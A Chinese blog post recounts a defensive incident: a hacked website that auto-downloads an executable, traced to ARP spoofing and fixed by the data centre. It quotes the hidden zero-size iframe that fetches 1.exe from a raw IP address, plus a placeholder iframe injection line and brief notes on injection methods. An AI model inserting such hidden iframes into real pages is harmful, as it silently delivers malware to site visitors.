网站被黑，打开网页自动下载文件

今天上班，来了个电话，接起来之后，客户说网站被黑了。一打开网页，就下载文件。

于是我打开客户说的网页，试了下，还真是自动下载了1个 1.exe 文件。

查看源代码，发现最上面一行， 有 <iframe src= http://121.41.109.152/1.exe width=0 height=0></iframe>   这个代码。   

没办法，于是远程连接服务器 到服务器上 ，查看程序文件。但确认了几片，服务器上的程序文件都是正常的，并没有发现上面那行代码。

这是什么情况？    于是 上网上搜索 “网页被插入 <iframe>” ,  找到 一篇文章，原文地址（http://www.splaybow.com/post/insertiframe08450711122007.html）

1、直接在每个页面加入一句：<iframe src='http://www.xxx.com/mm.htm'></iframe>，遇到这种情况比较讨厌，因为这是一个一点“环保意识”都没有的黑客。恢复的办法是找一个“批量文件替换器”，对网站进行通篇查找，遇到上面那串代码就把它替换成空。
2、在网站的公共包含文件里面插入这句代码：比如说，一个公共的asp头部文件，尾部文件，或者是js脚本文件等都有可能。解决办法就是把它找出来，然后删除它。当然，要把它找出来，得稍微动动脑筋。
3、比较强的一种，把代码放在Flash里面。Flash支持ActionScript，而ActionScript又跟Javascript差不多，Javascript能做的事情，它基本上也能做，所以要插入一句<iframe>是很容易的事情。要找出来可比较难，IE有一个httpwatch插件，它可能跟踪IE载入网页元素的代码，你可以看得到它在载入什么元素的时候出现的<iframe>，如果正好出现<iframe>之前是一个flash，那么恭喜你，就是它了。
4、ARP攻击。关于什么是arp攻击，我就不多说了，唯一提醒一下的是，这种情况下，你的网站可能根本就没有被人改什么，看到iframe代码是因为和你网站服务器同处一个网段的某服务器在攻击你。解决办法是联系相应的网络管理人员。如果你就是该网络的管理人员，那就不用我多说什么了吧，找到“某”，断掉它。

看了上面的文章，感觉自己遇到的情况，与第4中比较像。于是 拨通IDC机房负责人电话，将遇到情况给他们反馈了下，让他们查询了下。

过了大概1小时左右，机房那边查到了恶意arp攻击ip，封掉了IP。于是网站恢复正常！